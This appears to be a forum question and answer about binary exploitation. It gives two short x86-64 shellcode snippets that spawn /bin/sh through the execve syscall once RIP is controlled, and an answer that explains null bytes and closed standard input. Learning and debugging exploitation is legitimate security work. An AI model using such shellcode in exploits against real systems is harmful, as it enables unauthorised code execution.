I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one : Put in case that I can control the RIP and there are no limitations or filters. So I can execute the assembly code as I want.
mov rax, 0x0068732f6e69622f
push rax
push rsp
pop rdi
mov rax ,0x3b
xor rsi, rsi
xor rdx, rdx
syscall
lea rdi, [rip + shell]
mov rax, 0x3b
xor rsi, rsi
xor rdx, rdx
syscall
shell:
.string "/bin/sh"
While I usually use the above one, I don't get why the first one isn't working. I also used GDB to verify and everything seems to be good and in the right positions. In addition to that I also get in dgb:
process 8870 is executing new program: /usr/bin/dash.
Why it doesn't work?
stdin
is not closed when bash is run.0x68
is not problematic as a byte value. A null byte could be, depending on your exploit vector but you are using null bytes on both shellcodes. Are you sure you are not dropped in a new shell without realizing it? It's easy to make trivial mistake when dealing with complex things like binary exploitation. If gdb shows that bash is executed then either you are in the new shell or the new shell found a closed descriptor for standard input and exited immediately.